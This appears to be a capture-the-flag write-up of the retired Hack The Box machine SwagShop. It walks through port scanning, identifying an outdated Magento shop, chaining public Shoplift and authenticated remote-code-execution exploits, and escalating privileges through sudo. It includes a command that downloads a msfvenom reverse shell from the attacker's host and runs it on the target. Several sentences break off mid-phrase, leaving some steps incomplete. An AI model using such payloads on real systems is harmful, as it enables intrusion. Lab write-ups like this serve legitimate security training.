On this post
- Information Gathering
- Low-Privilege Shell
- Privilege Escalation
SwagShop is a retired vulnerable VM from Hack The Box.
Let’s start with a
masscan probe to establish the open ports in the host.
# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.140 --rate=700 Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-05-14 01:30:31 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 22/tcp on 10.10.10.140 Discovered open port 80/tcp on 10.10.10.140
Nothing unusual. Let’s do one better with
nmap scanning the discovered ports to establish the services.
# nmap -n -v -Pn -p22,80 -A --reason -oN nmap.txt 10.10.10.140 ... PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA) | 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA) |_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519) 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu)) |_http-favicon: Unknown favicon MD5: 88733EE53676A47FC354A61C32516E82 |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Error 503: Service Unavailable
http service appears to be running an old version of Magento Community Edition (2014? Hello, it’s 2019!). Sometimes it pays to look at the copyright notice down at the footer. Here’s how it looks like.
Magento Community Edition 220.127.116.11
How do I know the version? Check out the release notes basically. The directory structure is also found in a GitHub repository mirror for older versions.
Magento Shoplift Vulnerability
This particular version is susceptible to the Magento Shoplift vulnerability discovered by Checkpoint in 2015.
Well, there’s a readily available exploit, EDB-ID 37977 for it. Running this exploit will grant access to the Admin Panel with credentials (
Magento CE < 18.104.22.168 - (Authenticated) Remote Code Execution
This next exploit, EDB-ID 37811 will allow us to execute remote commands. There are just two minor modifications to the exploit script.
We got the credentials from the previous exploit. The installation date can be obtained from
http://10.10.10.140/app/etc/local.xml as suggested.
One last thing we need to know is the URL to the Admin Panel, which is
http://10.10.10.140/index.php/admin. You can get a feel of the directory structure by navigating the site a bit, provided it doesn’t give you
I generate a reverse shell with
msfvenom, host it with Python’s SimpleHTTPServer, and also set up a
nc listener. We then execute the exploit like so.
# python rce.py http://10.10.10.140/index.php/admin "wget -O/tmp/rev http://10.10.14.11/rev; chmod +x /tmp/rev; /tmp/rev"
It’s customary to display
user.txt is in
haris’s home directory and it can be disappointingly read by all.
This means that
haris is able to
sudo to a certain extent.
There you go, classic escape to
With that, getting
root.txt is a breeze.
What a neat idea to promote the SwagShop!